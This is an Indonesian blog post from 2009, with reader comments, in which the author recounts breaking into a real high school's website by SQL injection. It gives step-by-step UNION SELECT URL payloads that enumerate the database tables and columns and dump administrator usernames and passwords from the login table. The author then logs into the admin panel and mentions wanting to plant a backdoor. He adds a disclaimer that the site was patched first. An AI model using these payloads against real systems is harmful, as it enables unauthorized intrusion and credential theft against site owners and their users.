qu4cksoft weblogs

SQL Injection On SMA***********

03-02-2009 - Oleh : admin

Saya harap ini tidak terjadi pada website lain, karena setelah mencari2 bug seperti ini banyak di temukan pada website2 indonesia. Sebelumnya saya juga minta maaf atas pembobolan pada Website di bawah (Maaf anda target yang tepat).Saya tidak menjelaskan detil tentang cara Injeksi yang saya lakukan pada website ini, dan setelah lama nunggu path barulah saya POST di web ini (sekaligus permintaan dari Adminnya).

Ok langsung pada intinya saja :

1. Saya injeksi dengan memasukkan perintah
http://sma***********.sch.id/?menu=detailberita&id=15 union select 1,2,3,4,5,6,7
angka2 itu gunanya apa? itu adalah batas error databasenya. Dari sinilah mula BUG itu timbul, setelah anda menjalankan perintah itu akan muncul angka2 pada website tersebut.

2. Selanjutnya saya memasukkan
http://sma***********.sch.id/?menu=detailberita&id=15 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()

akan memunculkan Tabel2 yg ada pada database, lihat gambar berikut :

tabel

3. Sekarang kita mencoba mencari kolom dari tabel tblogin,
kita inject dg perintah ->> tblogin = 74626c6f67696e (convert hexa)
http://sma***********sch.id/?menu=detailberita&id=15 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=0x74626c6f67696e

4. Naahh setelah terlihat kolom apa saja yg ada pada tabel tblogin, sekarang kita akan cari user n passwordnya perintahnya :
http://sma***********.sch.id/?menu=detailberita&id=15 union select 1,2,group_concat(username,0x3a3a,password),4,5,6,7 from tblogin

akan tampil

user_pass

Terdapat 3 administrator pada website ini dan saya masuk melalui user betantyo

5. Dan akhirnya saya masuk ke halaman adminnya, pengennya pasang Backdoor pada web ini, tapi fasilitas upload difilter :( Emaneeeeeee

ini hanya sebagai gambaran saja, bukan tutorial untuk melakukan aksi perusakan. Ingat tidak ada yang 100% Aman tapi alangkah baiknya kita berhati - hati pada Hal - hal semacam ini, Thanks Mao Liak2 artikel Jelek ini.

Yang ngajari Kenakalan ini yang punya Web ini Neehhh

Komentar Pengunjung

pengen coba donk!
21:03, 06-03-2009 - Oleh : setiam3
waduh sql injectionnya ampuh juga, ternyata sql injection tu banyak fariasinya ya?

This is My High School
7:14, 24-03-2009 - Oleh : fyanasterix
Tuh koq SMA aq tercinta sie yang jadi korban !
cari donk sma laen buat percobaan !
kan kasihan !!!

wah gak berez !!!
17:54, 25-03-2009 - Oleh : korugane.808
sma ane tuh pak. .
asal ga ngrusak ya ga apa. .
bagi ilmu juga intinya. . .

Hmmmm
10:00, 28-03-2009 - Oleh : qu4ck
waduhhh Alumninya pada Protes smua neehhh,
Muup2 bukan bermaksud untuk merusak neehhh...
Tapi hanya Uji COba Sistem aja. Tapi sebelum ane POST neehh Artikel udah saya beritahuna dulu ke adminnya jadi udah di Path... Heeee... mudah2an g ada Lubang lagi...

Mantaf SQL na ums...
0:17, 21-06-2009 - Oleh : irw4nFR
mantaf2 ums..ajarin la SQL injek v 4 dunk..:p

Formulir Pengisian Komentar